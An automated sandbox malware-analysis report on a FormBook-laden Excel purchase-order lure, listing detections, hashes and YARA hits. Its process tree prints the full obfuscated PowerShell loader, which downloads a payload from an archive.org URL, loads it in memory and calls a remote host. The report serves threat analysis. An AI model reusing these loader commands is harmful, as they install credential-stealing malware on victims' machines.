Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Mac Purchase Order PO102935.xls

Overview

General Information

Sample name:Mac Purchase Order PO102935.xls
Analysis ID:1493701
MD5:e07cfed85c1ddf5a98b21de6cb894a18
SHA1:092241ff646b40b753d18973ec61638a0f70fa98
SHA256:5daccf2d036e313eacb7b0660c8f6c4b4eb48a7bf841f5f85a68eaf08b678553
Tags:xls
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious Excel or Word document
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2456 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 2408 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 300 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3104 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3148 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBH? ? ? ? ?FI? ? ? ? ?Vw? ? ? ? ?v? ? ? ? ?DM? ? ? ? ?N? ? ? ? ?? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Mw? ? ? ? ?z? ? ? ? ?C4? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?DE? ? ? ? ?Lg? ? ? ? ?w? ? ? ? ?DE? ? ? ? ?Mg? ? ? ? ?u? ? ? ? ?DI? ? ? ? ?OQ? ? ? ? ?x? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?ZQBz? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?YQBk? ? ? ? ?G8? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?UgBl? ? ? ? ?Gc? ? ? ? ?QQBz? ? ? ? ?G0? ? ? ? ?Jw? ? ? ? ?s? ? ? ? ?Cc? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ck? ? ? ? ?';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 3356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • wfbjvizcWo.exe (PID: 1372 cmdline: "C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • find.exe (PID: 3408 cmdline: "C:\Windows\SysWOW64\find.exe" MD5: 5816034B0B629756163B80838853B730)
                • wfbjvizcWo.exe (PID: 1980 cmdline: "C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • firefox.exe (PID: 3576 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x178d:$obj2: \objdata
  • 0x1773:$obj3: \objupdate
  • 0x174b:$obj5: \objautlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x178d:$obj2: \objdata
  • 0x1773:$obj3: \objupdate
  • 0x174b:$obj5: \objautlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17102:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x3cd39:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x24fe8:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        11.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          11.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16302:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          11.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            11.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17102:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            Exploits

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internet
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.210.150.33, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 300, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
            Sigma detected: File Dropped By EQNEDT32EXE
